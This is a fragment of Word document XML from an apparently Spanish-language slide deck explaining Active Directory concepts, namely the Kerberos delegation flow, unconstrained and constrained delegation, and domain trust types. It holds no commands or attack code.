                        <w:ind w:left="167" w:hanging="22"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>7. La cuenta de servicio del servidor de aplicaciones se conecta al servidor de base de datos como dominio</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3CEFD45E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="290" w:lineRule="exact"/>
                        <w:ind w:left="1754"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:spacing w:val="-4"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>usuario</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61408F5E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="52"/>
        <w:ind w:left="959" w:right="7361"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8EC48" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1D458C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="261"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D01D8F7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:ind w:right="1463"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15774208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="780735CD" wp14:editId="47A7EB70">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>193547</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-280370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2880360" cy="46228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462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0852568F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="66" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="1365" w:hanging="1056"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>4. DC proporciona TGS para acceder al servicio en el servidor de aplicaciones</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="780735CD" id="Textbox 235" o:spid="_x0000_s1132" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:15.25pt;margin-top:-22.1pt;width:226.8pt;height:36.4pt;z-index:1577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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0852568F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="66" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="1365" w:hanging="1056"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>4. DC proporciona TGS para acceder al servicio en el servidor de aplicaciones</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15775744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10000C2B" wp14:editId="6CDF9759">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5106670</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>280461</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1977389" cy="15240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389" cy="152400"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0389CA67" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="exact"/>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 w14:anchorId="10000C2B" id="Textbox 236" o:spid="_x0000_s1133" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:402.1pt;margin-top:22.1pt;width:155.7pt;height:12pt;z-index:1577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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0389CA67" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="exact"/>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v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AED2BAF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId93"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="220" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B1BC02" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1403"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="1403" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tipos de delegación de Kerberos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68864DB3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="154"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="035FB5FB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2123"/>
        </w:tabs>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="2123" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Delegación sin restricciones </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>: Permite al servidor de aplicaciones solicitar acceso a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D50B85" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">CUALQUIER </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>servicio en cualquier servidor del dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D279CAC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B24489" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="98"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FBEB46" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2123"/>
        </w:tabs>
        <w:ind w:left="2123" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La delegación sin restricciones está habilitada de forma predeterminada en los controladores de dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237DBC6A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B1FC23" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="152"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C228516" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2124"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="2043"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Delegación restringida </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>: Permite al servidor de aplicaciones solicitar acceso SOLO a servicios específicos en servidores específicos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43586393" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId94"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1180" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:pgNumType w:start="62"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F0DC4A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1065"/>
        </w:tabs>
        <w:spacing w:before="350"/>
        <w:ind w:left="1065" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Confianzas de dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233FCD37" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1786"/>
        </w:tabs>
        <w:spacing w:before="621" w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1059"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La confianza representa la relación entre dos dominios o bosques que permite a los usuarios o servicios de un dominio o bosque acceder a los recursos del otro dominio o bosque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B071A6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="104"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4904CFC3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1785"/>
        </w:tabs>
        <w:ind w:left="1785" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Tipos de Fideicomiso :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A3393D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2506"/>
        </w:tabs>
        <w:spacing w:before="54"/>
        <w:ind w:left="2506" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Relación de confianza entre padres e hijos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7CB5B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2506"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="2506" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Relación de Fideicomiso de Bosque a Bosque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A10EA4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2506"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="2506" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Relación de confianza árbol-raíz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BB8658" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="98"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1D8C80" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1785"/>
        </w:tabs>
        <w:ind w:left="1785" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La confianza identifica las entidades de un dominio o bosque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA3DC9E"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399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08539C9A"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64224" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="58BE2758" wp14:editId="11F8381C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1030224</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>242369</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10136505" cy="639826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6505" cy="6398260"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10136505" cy="6398260"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="240" name="Image 240"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId95" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="10136124" cy="6397668"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="241" name="Graphic 241"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2799588" y="2301186"/>
                            <a:ext cx="4676775" cy="1210310"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="4676775" h="1210310">
                                <a:moveTo>
                                  <a:pt x="4152138" y="1165606"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="551688" y="1165606"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="551688" y="1133856"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="475488" y="1171956"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="551688" y="1210056"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="551688" y="1178306"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4152138" y="1178306"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4152138" y="1165606"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="4676775" h="1210310">
                                <a:moveTo>
                                  <a:pt x="4676775" y="38100"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4664075" y="31750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4600575" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4600575" y="31750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="31750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="44450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4600575" y="44450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4600575" y="76200"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4664075" y="44450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4676775" y="38100"/>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242" name="Image 242"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId96" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2275204" y="276425"/>
                            <a:ext cx="5728504" cy="414020"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
